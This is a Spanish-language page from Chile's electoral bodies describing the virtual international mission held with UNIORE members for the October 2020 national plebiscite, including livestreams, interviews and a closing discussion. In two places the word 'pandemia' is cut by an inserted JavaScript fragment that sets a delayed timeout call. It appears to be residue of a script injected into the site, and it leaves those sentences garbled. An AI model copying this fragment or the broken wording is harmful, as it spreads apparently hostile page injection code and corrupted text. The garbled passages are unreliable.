MISIÓN INTERNACIONAL VIRTUAL PLEBISCITO NACIONAL 2020

En el contexto del Plebiscito Nacional efectuado el 25 de octubre de 2020, el Tribunal Calificador de Elecciones y el Servicio Electoral convocó a una Misión Internacional Virtual a los integrantes de la Unión Interamericana de Organismos Electorales.

Atendidas las condiciones de pandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andemia provocadas por el COVID-19 y en resguardo de la salud de los delegados, en esta ocasión la Misión Internacional se efectuó en forma virtual, desde el portal web www.visitasinternacionaleschile.cl , donde las autoridades y funcionarios de los organismos invitados pudieron encontrar información relevante sobre este proceso electoral, con una actualización permanente con las principales noticias que fueron sucediendo en la preparación y desarrollo de este acto democrático. Con imágenes, videos y documentos a disposición de los invitados para su consulta y descarga, para conocer mejor el proceso electoral chileno.

Durante el día de la votación, se pudo revisar en vivo cómo se desarrollaba el proceso electoral desde diferentes regiones del país, a través de streaming que registró en vivo cómo avanzaba el proceso y el protocolo sanitario preparado especialmente para el desarrollo de estos comicios en medio de la pandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andemia mundial.

Además, participaron en diversas entrevistas la Secretaria Relatora del Tribunal, señora Carmen Gloria Valladares Moyano, así como el Oficial Primero, abogado Manuel Ferrada Ferrada y el Jefe de la División Electoral, don Arturo Lagos Parisi. Al termino de la jornada, los Organismos Electorales pertenecientes a UNIORE, desarrollaron un espacio de conversación y análisis, dirigido por el Director Ejecutivo del Instituto Interamericano de Derechos Humanos – Centro de Asesoría y Promoción Electoral, CAPEL, señor Joseph Thompson.